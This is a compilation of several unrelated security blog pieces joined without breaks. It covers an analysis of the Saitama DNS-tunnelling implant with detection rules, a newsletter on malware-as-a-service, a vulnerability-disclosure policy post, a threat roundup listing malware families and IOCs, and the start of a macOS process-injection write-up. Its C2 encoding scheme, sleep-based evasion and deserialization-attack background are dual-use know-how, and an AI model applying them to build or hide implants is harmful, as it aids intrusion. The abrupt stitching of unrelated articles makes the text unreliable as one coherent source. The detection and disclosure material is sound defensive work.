For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.Β Β
On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (βharutoβ for the variant discussed here) and a shared initial character set (βrazupgnv2w01eos4t38h7yqidxmkljc6b9f5β), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every βtwistβ.Β
To encode this counter, the implant relies on a function named β_IntToStringβ. This function receives an integer and a βbase stringβ, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable βstrβ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down.Β
Function used by Saitama client to convert an integer into an encoded string.Β
To determine the initial seed, the server has to βinvertβ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found.Β Β Β
Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same βlanguageβ. The server then simply substitutes the characters from the shuffled alphabet back into the βbaseβ alphabet to derive what data was sent by the client.Β Β
Server-side implementation to arrive at the same shuffled alphabet as the client.Β
Twist, Sleep, Send, Repeat
Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.Β Β
The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to βskipβ the sleeping step altogether.Β Β
Sleep configuration of the implant. The integers represent sleep times in milliseconds.
These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further βblend inβ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the βneedleβ that is this implantβs traffic very deep in the haystack of the overall network traffic.Β Β
For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitamaβs sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the βwhoami /privβ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server.Β Β
Transmission between server implementation and the implant
Transmission between server implementation and the implantΒ
The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command.Β
Detection
Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While βidleβ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication βburstsβ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.Β Β
Signature-basedΒ
Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule:Β
Only trigger if there are more than 50 queries in the last 3600 seconds. And only trigger once per 3600 seconds.Β
Table one: Content matches for Suricata IDS rule
Β The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the βsend and receiveβ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the βcounterβ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes.Β
Behaviour-basedΒ
The randomization that makes it difficult to create signatures is also to the defenderβs advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited.Β Β
Table two: Example DNS queries for various toolings that support DNS tunnelling
Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.Β Β
This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as βrandomizedβ. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour.Β Β
To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives.Β
In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign.Β
While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs.Β
Conclusion
When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implantβs behaviour. This can subsequently be used for detection engineering purposes.Β
Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.Β Β
Resources
With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.Β Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub.Β Β
This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.Β
Welcome to this weekβs edition of the Threat Source newsletter.Β
Everyone seems to want to create the next βNetflixβ of something. Xboxβs Game Pass is the βNetflix of video games.β Rent the Runway is a βNetflix of fashionβ where customers subscribe to a rotation of fancy clothes.Β
And now threat actors are looking to be the βNetflix of malware.β All categories of malware have some sort of "as-a-service"Β twist now. Some of the largest ransomware groups in the world operate βas a service,β allowing smaller groups to pay a fee in exchange for using the larger groupβs tools.Β Β
Our latest report on information-stealers points out that βinfostealers as-a-service" are growing in popularity, and our researchers also discovered a new βC2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy β relatively speaking β this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like βNight Riderβ to the live action of βShrek: The Musicalβ and everything in between.Β Β
How much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever theyβre in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I donβt even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti.Β Β
With everything going βas a serviceβ it means I donβt necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want.Β Β
This is not necessarily as easy as picking a show on Netflix. But itβs not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an βas-a-service" ransomware attack.Β Β
I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these βas a serviceβ platforms offline. Maybe that just means we need to start working on the βNetflix of cybersecurity tools.βΒ
Β Β
The one big thingΒ
Historically, cybercrime was considered white-collar criminal behavior perpetrated by those that were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and desire can get started in cybercrime. The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more in favor of traditional βhands-onβ crime.Β
Why do I care?Β
Everyone panics when the local news shows a graph with βviolent crimeβ increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, βas a serviceβ malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars.Β Β
So now what?Β
Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams like the classic βIβm in the hospital and need money.βΒ
Β
Other news of note
Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it βmore likelyβ to be exploited. MSDT was already the target of the so-called βFollinaβ zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and memory leak. (Talos blog, Krebs on Security, SecurityWeek)Β
Some of the U.K.βs 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The countryβs National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patientsβ records, though the incident has been βcontained.β (SC Magazine, Bloomberg, The Guardian)Β
An 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Courtβs reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN)Β
Today at the Black Hat USA conference, we announced some new disclosure timelines. Our standard 120-day disclosure timeline for most vulnerabilities remains, but for bug reports that result from faulty or incomplete patches, we will use a shorter timeline. Moving forward, the ZDI will adopt a tiered approach based on the severity of the bug and the efficacy of the original fix. The first tier will be a 30-day timeframe for most Critical-rated cases where exploitation is detected or expected. The second level will be a 60-day interval for Critical- and High-severity bugs where the patch offers some protections. Finally, there will be a 90-day period for other severities where no imminent exploitation is expected. As with our normal timelines, extensions will be limited and granted on a case-by-case basis.
Since 2005, the ZDI has disclosed more than 10,000 vulnerabilities to countless vendors. These bug reports and subsequent patches allow us to speak from vast experience when it comes to the topic of bug disclosure. Over the last few years, weβve noticed a disturbing trend β a decrease in patch quality and a reduction in communications surrounding the patch. This has resulted in enterprises losing their ability to accurately estimate the risk to their systems. Itβs also costing them money and resources as bad patches get re-released and thus re-applied.
Adjusting our disclosure timelines is one of the few areas that we as a disclosure wholesaler can control, and itβs something we have used in the past with positive results. For example, our disclosure timeline used to be 180 days. However, based on data we tracked through vulnerability disclosure and patch release, we were able to lower that to 120 days, which helped reduce the vendorβs overall time-to-fix. Moving forward, we will be tracking failed patches more closely and will make future policy adjustments based on the data we collect.
Another thing we announced today is the creation of a new Twitter handle: @thezdibugs. This feed will only tweet out published advisories that are either a high CVSS, 0-day, or resulting from Pwn2Own. If youβre interested in those types of bug reports, we ask that you give it a follow. Weβre also now on Instagram, and you can follow us there if you prefer that platform over Twitter.
Looking at our published and upcoming bug reports, we are on track for our busiest year ever β for the third year in a row. That also means weβll have plenty of data to look at as we track incomplete or otherwise faulty patches, and weβll use this data to adjust these timelines as needed based on what we are seeing across the industry. Other groups may have different timelines, but this is our starting point. With an estimated 1,700 disclosures this year alone, we should be able to gather plenty of metrics. Hopefully, we will see improvements as time goes on.
Until then, stay tuned to this blog for updates, subscribe to ourΒ YouTubeΒ channel, and follow us onΒ TwitterΒ for the latest news and research from the ZDI.Β
New Disclosure Timelines for Bugs Resulting from Incomplete Patches
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name
Type
Description
Win.Dropper.Tofsee-9960568-0
Dropper
Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0
Dropper
Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0
Trojan
Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1
Dropper
DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0
Ransomware
TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1
Virus
Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0
Dropper
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0
Dropper
Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0
Dropper
Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Threat Breakdown
Win.Dropper.Tofsee-9960568-0
Indicators of Compromise
IOCs collected from dynamic analysis of 10 samples
Registry Keys
Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config4
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-1
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-2
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-4
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-3
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-100
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-101
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-102
3
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-103
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2
3
<HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: DisplayName
1
Mutexes
Occurrences
Global\27a1e0c1-13fc-11ed-9660-001517101edf
1
Global\30977501-13fc-11ed-9660-001517215b93
1
IP Addresses contacted by malware. Does not indicate maliciousness
Occurrences
216[.]146[.]35[.]35
3
31[.]13[.]65[.]174
3
142[.]251[.]40[.]196
3
96[.]103[.]145[.]165
3
31[.]41[.]244[.]82
3
31[.]41[.]244[.]85
3
80[.]66[.]75[.]254
3
80[.]66[.]75[.]4
3
31[.]41[.]244[.]128
3
31[.]41[.]244[.]126/31
3
208[.]76[.]51[.]51
2
74[.]208[.]5[.]20
2
208[.]76[.]50[.]50
2
202[.]137[.]234[.]30
2
212[.]77[.]101[.]4
2
193[.]222[.]135[.]150
2
203[.]205[.]219[.]57
2
47[.]43[.]18[.]9
2
67[.]231[.]144[.]94
2
188[.]125[.]72[.]74
2
40[.]93[.]207[.]0/31
2
205[.]220[.]176[.]72
2
135[.]148[.]130[.]75
2
121[.]53[.]85[.]11
2
67[.]195[.]204[.]72/30
1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness
This was added to the Xcode template to address a process injection vulnerability we reported!
In macOS 12.0.1 Monterey, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.
Process injection
Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.
In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
This was, in essence, the same security model as macOS until the introduction of SIP, also known as βrootlessβ. This name doesnβt mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) are no longer possible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.
For example, using the following command we can see the entitlements of Mail.app:
This is what grants Mail.app the permission to read the SIP protected mail database, while other malware will not be able to read it.
Aside from entitlements, there are also the permissions handled by Trust, Transparency and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Download folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.
Of course entitlements and TCC permissions would be useless if any process can just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesnβt, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.
Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered.
Aside from Appleβs own code, these vulnerabilities could also occur in third-party software. Itβs quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.
More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as weβll demonstrate in this post.
The saved state vulnerability
When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is a part of functionally called βsaved stateβ or βpersistent UIβ.
When reopening the windows, it can even restore new documents that were not yet saved in some applications.
It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminates the process. macOS keeps showing a static image of the applicationβs windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.
When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.
Each time an application loses focus, it writes to the files:
The windows.plist file contains a list of all of the applicationβs open windows. (And some other things that donβt look like windows, such as the menu bar and the Dock menu.)
For example, a windows.plist for TextEdit.app could look like this:
The data.data file contains a custom binary format. It consists of a list of records, each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and a ID (NSWindowID) for the record from data.data it corresponds to.1
For example:
00000000 4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0 |NSCR1000........|
00000010 ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74 |..&.....A]sz..Yt|
00000020 89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70 |..=..z.......WMp|
00000030 cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23 |.U..q.......(.x#|
00000040 ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a |..0)....Gu(P....|
00000050 94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df |....]...Fb..v.o.|
00000060 43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8 |C..z../%C...|Y..|
00000070 a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d |...]........\q..|
00000080 81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a |....-SuCm.......|
00000090 9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f |.X....s..f....2.|
000000a0 1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46 |.Z....9..k...{.F|
000000b0 0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4 |...........}.J..|
000000c0 d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94 |[email protected]+p..H.|
000000d0 47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0 |G=O.v:.4y.?]hW}.|
000000e0 54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5 |To.N[=S*m5..l._.|
000000f0 06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f |..L.Q...).%H+jt.|
00000100 1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49 |.[^..........S.I|
00000110 4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45 |MxZ.y..h?Q.....E|
00000120 65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07 |[email protected])F.l.|
00000130 34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0 |4h....7.....|...|
00000140 4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13 |K.&....-.J..&...|
00000150 65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4 |e..f...U.....9&.|
00000160 c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b |....,..y_b.9....|
00000170 3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1 |=.\.0.+....I....|
00000180 c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa |..A.>+....d=y...|
00000190 3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8 |=V...z...L....*.|
000001a0 c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06 |.>%..Ke.....#...|
[...]
Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.
The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using βsecure codingβ. To explain what that means, weβll first explain serialization vulnerabilities, in particular on macOS.
Serialized objects
Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.
In many of those languages these features have lead to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.
For Python pickle and Ruby Marshall.load remote code execution is straightforward. In Java ObjectInputStream.readObject and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.
Objective-C serialization
In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.
How this works in practice is as follows. A class that implements NSCoding must include a method:
-(id)initWithCoder:(NSCoder*)coder;
In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.
Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:
A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.
This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.
